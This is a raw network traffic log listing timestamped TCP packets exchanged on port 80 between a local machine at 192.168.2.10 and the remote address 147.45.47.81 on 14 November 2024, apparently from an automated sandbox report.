                                                                                                                                                                                                            Nov 14, 2024 12:19:58.943684101 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.943691015 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.943701029 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.943707943 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.943716049 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.943716049 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.943726063 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.943733931 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.943742990 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.943744898 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.943753004 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.943762064 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.943770885 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.943769932 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.943779945 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.943789005 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.943795919 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.943804026 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.943825960 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.943990946 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.944003105 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.944016933 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.944031954 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.944041967 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.944046974 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.944052935 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.944062948 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.944072008 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.944080114 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.944082022 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.944092989 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.944103003 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.944113970 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.944118977 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.944123983 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.944129944 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.944134951 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.944149017 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.944169998 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.944220066 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.944231033 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.944242001 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.944252014 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.944262028 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.944267988 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.944271088 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.944281101 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.944291115 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.944293022 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.944312096 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.944329977 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.944546938 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.944557905 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.944567919 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.944600105 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.944685936 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.944701910 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.944714069 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.944722891 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.944724083 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.944734097 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.944744110 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.944749117 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.944768906 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.944770098 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.944781065 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.944789886 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.944808006 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.944817066 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.944817066 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.944827080 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.944838047 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.944847107 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.944848061 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.944856882 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.944859982 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.944866896 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.944889069 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.944911957 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.944941044 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.944950104 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.944984913 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.952300072 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.952316999 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.952327967 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.952353001 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.952364922 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.952369928 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.952377081 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.952423096 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.952423096 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.952426910 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.952439070 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.952449083 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.952502012 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.970313072 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.970328093 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.970339060 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.970352888 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.970375061 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.992733955 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.006095886 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.006114006 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.006124973 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.006292105 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.007040024 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.007055998 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.007066965 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.007121086 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.007121086 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.008179903 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.008196115 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.008244991 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.008344889 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.008656979 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.008730888 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.014472961 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.014566898 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.014616013 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.014882088 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.015034914 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.015053034 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.015151024 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.015182972 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.015201092 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.015212059 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.015223026 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.015337944 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.015337944 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.015352964 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.015367985 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.015403986 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.015527010 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.018101931 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.018120050 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.018131018 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.018141985 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.018152952 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.018163919 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.018174887 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.018181086 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.018181086 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.018204927 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.018222094 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.018238068 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.018249035 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.018259048 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.018270016 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.018296957 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.018296957 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.018296957 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.018354893 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.018372059 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.018381119 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.018395901 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.018395901 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.018517017 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.018860102 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.018873930 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.018883944 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.018894911 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.018904924 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.018914938 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.018925905 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.018935919 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.018939972 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.018939972 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.018939972 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.018948078 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.018960953 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.018973112 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.018978119 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.019068956 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.019068956 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.019172907 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.019188881 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.019200087 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.019210100 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.019221067 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.019236088 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.019293070 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.019328117 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.019328117 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.019480944 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.019500017 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.019511938 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.019610882 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.019826889 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.019841909 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.019853115 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.019884109 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.019884109 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.019968033 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.019982100 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.019990921 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.020000935 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.020011902 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.020011902 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.020024061 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.020149946 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.020157099 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.020157099 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.020164013 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.020217896 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.020325899 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.020344019 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.020359039 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.020397902 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.020493031 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.020508051 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.020524025 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.020534039 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.020545006 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.020580053 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.020580053 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.020580053 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.020653963 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.020665884 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.020680904 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.020692110 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.020701885 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.020883083 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.020883083 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.043481112 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.043518066 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.043528080 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.043529987 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.043540001 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.043605089 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.043663025 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.043719053 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.061726093 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.061754942 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.061780930 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.061793089 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.061798096 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.061804056 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.061815977 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.061826944 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.061837912 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.061837912 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.061847925 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.061857939 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.061858892 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.061871052 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.061881065 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.061892033 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.061908960 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.061918020 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.061920881 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.061933994 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.061945915 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.061989069 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.061997890 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.062010050 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.062022924 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.062052965 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.062068939 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.062086105 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.062096119 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.062110901 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.062123060 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.062128067 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.062134027 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.062150002 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.062207937 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.062300920 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.062318087 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.062326908 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.062335968 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.062345028 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.062359095 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.062375069 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.062385082 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.062386036 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.062393904 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.062403917 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.062408924 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.062419891 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.062421083 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.062431097 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.062443972 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.062457085 CET4995880192.168.2.10147.45.47.81
